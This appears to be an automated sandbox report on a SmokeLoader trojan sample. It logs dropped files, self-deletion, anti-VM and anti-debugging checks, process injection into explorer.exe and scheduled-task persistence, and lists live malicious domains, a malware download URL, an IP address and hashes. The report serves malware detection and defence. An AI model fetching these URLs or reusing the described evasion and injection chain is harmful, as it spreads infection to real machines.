Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
Source: C:\Users\user\AppData\Roaming\gahfeaj	Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\gahfeaj

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\D380.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/3@10/1

Source: qhQ6armJ25.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: qhQ6armJ25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: qhQ6armJ25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: qhQ6armJ25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: qhQ6armJ25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: qhQ6armJ25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: qhQ6armJ25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: qhQ6armJ25.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
Source:	Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source:	Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source:	Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_004025F7 pushad ; iretd
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_004029A6 push eax; ret
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_1_004025F7 pushad ; iretd
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_1_004029A6 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_01D23146 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_01D22D97 pushad ; iretd
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_01F24733 push ebp; ret
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_01F1FB3B pushad ; iretd
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_01F24210 push edi; ret
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_004025F7 pushad ; iretd
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_004029A6 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 6_2_004025F7 pushad ; iretd
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 6_2_004029A6 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 6_1_004025F7 pushad ; iretd

Source: C:\Users\user\Desktop\qhQ6armJ25.exe

Code function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: initial sample	Static PE information: section name: .text entropy: 7.04028491917
Source: initial sample	Static PE information: section name: .text entropy: 7.02591971436
Source: initial sample	Static PE information: section name: .text entropy: 7.04028491917

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\gahfeaj

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D380.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\gahfeaj			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\qhq6armj25.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier read attributes | delete

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: qhQ6armJ25.exe, 00000001.00000002.765854041.0000000001F40000.00000004.00000001.sdmp

Binary or memory string: ASWHOOK

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gahfeaj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gahfeaj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gahfeaj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gahfeaj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gahfeaj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gahfeaj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Source: C:\Windows\explorer.exe TID: 2936	Thread sleep count: 615 > 30
Source: C:\Windows\explorer.exe TID: 1316	Thread sleep count: 385 > 30
Source: C:\Windows\explorer.exe TID: 1316	Thread sleep time: -38500s >= -30000s
Source: C:\Windows\explorer.exe TID: 3080	Thread sleep count: 462 > 30
Source: C:\Windows\explorer.exe TID: 3080	Thread sleep time: -46200s >= -30000s
Source: C:\Windows\explorer.exe TID: 6360	Thread sleep count: 439 > 30
Source: C:\Windows\explorer.exe TID: 660	Thread sleep count: 281 > 30
Source: C:\Windows\explorer.exe TID: 6364	Thread sleep count: 282 > 30

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 615
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 385
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 462
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 439

Source: C:\Users\user\Desktop\qhQ6armJ25.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\qhQ6armJ25.exe

System information queried: ModuleInformation

Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAY
Source: explorer.exe, 00000002.00000000.749875732.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000002.00000000.732593679.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\gahfeaj	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\qhQ6armJ25.exe

Code function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\qhQ6armJ25.exe

Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_01D20042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_01F1D6AA push dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\gahfeaj	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\D380.exe

Code function: 6_1_00402679 LdrLoadDll,

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 0_2_0041E390 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_0041FDD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_0041DE90 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: gahfeaj.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: nalirou70.top
Source: C:\Windows\explorer.exe	Domain query: privacytoolzfor-you7000.top
Source: C:\Windows\explorer.exe	Domain query: xacokuo80.top

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\gahfeaj	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\gahfeaj	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\D380.exe

Memory written: C:\Users\user\AppData\Local\Temp\D380.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\D380.exe

Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Thread created: C:\Windows\explorer.exe EIP: 4F01920
Source: C:\Users\user\AppData\Roaming\gahfeaj	Thread created: unknown EIP: 3151920

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
Source: C:\Users\user\AppData\Roaming\gahfeaj	Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe

Source: explorer.exe, 00000002.00000000.712673606.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.731425992.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.745782073.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.749862534.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.738660675.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.759191918.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\qhQ6armJ25.exe

Code function: 0_2_00418430 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Stealing of Sensitive Information:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	Process Injection512	Masquerading11	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Ingress Tool Transfer13	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion12	LSASS Memory	Security Software Discovery321	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection512	Security Account Manager	Virtualization/Sandbox Evasion12	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol124	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Hidden Files and Directories1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Information Discovery4	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
qhQ6armJ25.exe	45%	Virustotal		Browse
qhQ6armJ25.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gahfeaj	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D380.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.1.gahfeaj.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.gahfeaj.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.qhQ6armJ25.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.1.D380.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.gahfeaj.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.D380.exe.1d215a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.D380.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.0.D380.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.0.D380.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.qhQ6armJ25.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.0.D380.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.qhQ6armJ25.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.qhQ6armJ25.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.gahfeaj.1d715a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.gahfeaj.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.qhQ6armJ25.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.gahfeaj.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.qhQ6armJ25.exe.1d715a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
privacytoolzfor-you7000.top	6%	Virustotal	Browse
xacokuo80.top	8%	Virustotal	Browse
nalirou70.top	11%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://xacokuo80.top/	8%	Virustotal		Browse
http://xacokuo80.top/	0%	Avira URL Cloud	safe
http://nalirou70.top/	100%	Avira URL Cloud	phishing
http://privacytoolzfor-you7000.top/downloads/toolspab2.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
privacytoolzfor-you7000.top	212.192.241.249	true	true	6%, Virustotal, Browse	unknown
xacokuo80.top	212.192.241.249	true	true	8%, Virustotal, Browse	unknown
nalirou70.top	unknown	unknown	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://xacokuo80.top/	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nalirou70.top/	true	Avira URL Cloud: phishing	unknown
http://privacytoolzfor-you7000.top/downloads/toolspab2.exe	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.192.241.249	privacytoolzfor-you7000.top	Russian Federation		61269	RAPMSB-ASRU	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528745
Start date:	25.11.2021
Start time:	18:22:55
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	qhQ6armJ25.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/3@10/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 74.3% (good quality ratio 59.9%) Quality average: 52.2% Quality standard deviation: 35.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100

Simulations

Behavior and APIs

Time	Type	Description
18:24:50	Task Scheduler	Run new task: Firefox Default Browser Agent 944D867DB154EF14 path: C:\Users\user\AppData\Roaming\gahfeaj

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
212.192.241.249	ttY1E1yC3m.exe	Get hash	malicious	Browse	file-file-host4.com/tratata.php
	EUMeloHpr7.exe	Get hash	malicious	Browse	file-file-host4.com/tratata.php
	yH8giB6jJ2.exe	Get hash	malicious	Browse	xacokuo80.top/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
privacytoolzfor-you7000.top	yH8giB6jJ2.exe	Get hash	malicious	Browse	212.192.241.249
	AO7gki3UTr.exe	Get hash	malicious	Browse	47.254.176.217
	J73PTzDghy.exe	Get hash	malicious	Browse	212.193.50.242
	Fm9bT1UlKI.exe	Get hash	malicious	Browse	8.209.115.161
	LaicMpixgy.exe	Get hash	malicious	Browse	8.209.115.161
	daleUmOAcZ.exe	Get hash	malicious	Browse	8.209.115.161
	lAx2rypDqG.exe	Get hash	malicious	Browse	8.209.115.161
	oSI9rf0h2U.exe	Get hash	malicious	Browse	8.209.115.161
	iP1ZMsVOo6.exe	Get hash	malicious	Browse	8.209.115.161
	jyM8NR8QU7.exe	Get hash	malicious	Browse	8.209.115.161
	VBELHQLOAs.exe	Get hash	malicious	Browse	8.209.115.161
	ZrAv540yA4.exe	Get hash	malicious	Browse	47.254.33.79
	6Xtf11WnP2.exe	Get hash	malicious	Browse	47.254.33.79
	M9WBCy4NNi.exe	Get hash	malicious	Browse	47.254.33.79
	wj1j21cmxi.exe	Get hash	malicious	Browse	47.254.33.79
	Y5EGM7BygT.exe	Get hash	malicious	Browse	47.254.33.79
	BVxT3jA2K0.exe	Get hash	malicious	Browse	47.254.33.79
	yeLdmaW3oj.exe	Get hash	malicious	Browse	47.254.33.79
	7WXfPYaWt2.exe	Get hash	malicious	Browse	47.254.33.79
	7u0Gj7aYfG.exe	Get hash	malicious	Browse	47.254.33.79
xacokuo80.top	yH8giB6jJ2.exe	Get hash	malicious	Browse	212.192.241.249
	AO7gki3UTr.exe	Get hash	malicious	Browse	47.254.176.217
	J73PTzDghy.exe	Get hash	malicious	Browse	212.193.50.242
	Fm9bT1UlKI.exe	Get hash	malicious	Browse	8.209.115.161
	daleUmOAcZ.exe	Get hash	malicious	Browse	8.209.115.161
	lAx2rypDqG.exe	Get hash	malicious	Browse	8.209.115.161
	oSI9rf0h2U.exe	Get hash	malicious	Browse	8.209.115.161
	iP1ZMsVOo6.exe	Get hash	malicious	Browse	8.209.115.161
	VBELHQLOAs.exe	Get hash	malicious	Browse	8.209.115.161

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RAPMSB-ASRU	QSUoGqi867.exe	Get hash	malicious	Browse	212.192.241.70
	8p2NlqFgew.exe	Get hash	malicious	Browse	212.192.241.70
	QSUoGqi867.exe	Get hash	malicious	Browse	212.192.241.70
	ttY1E1yC3m.exe	Get hash	malicious	Browse	212.192.241.249
	EUMeloHpr7.exe	Get hash	malicious	Browse	212.192.241.249
	yH8giB6jJ2.exe	Get hash	malicious	Browse	212.192.241.249
	mN2NobuuDv.exe	Get hash	malicious	Browse	212.192.241.175
	OPKyR75fJn.exe	Get hash	malicious	Browse	212.192.241.70
	3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exe	Get hash	malicious	Browse	212.192.241.70
	23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exe	Get hash	malicious	Browse	212.192.241.70
	Purchase-Order433423.exe	Get hash	malicious	Browse	212.192.241.222
	HTJ.exe	Get hash	malicious	Browse	212.192.241.221
	5AHyELsVLZ.exe	Get hash	malicious	Browse	212.192.241.15
	1B0DAF8B1B8A09AE26A72E30FA638B000A991A7DFAF7C.exe	Get hash	malicious	Browse	212.192.241.15
	8F9CDF75C272FDA7DF367232756EA065600077804B165.exe	Get hash	malicious	Browse	212.192.241.15
	33CBD9E39DD39A84D0426897605B17000046E0FB14399.exe	Get hash	malicious	Browse	212.192.241.15
	setup_x86_x64_install.exe	Get hash	malicious	Browse	212.192.241.15
	iCm814vnxp.exe	Get hash	malicious	Browse	212.192.241.15
	0A223AA68AF0C2AF0BAABDA61D82748629078720A017E.exe	Get hash	malicious	Browse	212.192.241.15
	951049989EB772C71EC4FA9F0685AB45CAE755CA5D34C.exe	Get hash	malicious	Browse	212.192.241.15

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\D380.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	302592
Entropy (8bit):	5.813051493235412
Encrypted:	false
SSDEEP:	6144:8eWWd3GjRD8vAZvXJSXuZet0yS8Y48PGvx/6h:o63GwAZPJSXuZet0yS8YYvx/
MD5:	61BA8F1EDCD03481D6447E8EC34DC383
SHA1:	70B3702ECBCF7FF81C9C93CAAA5C1220DDCE0931
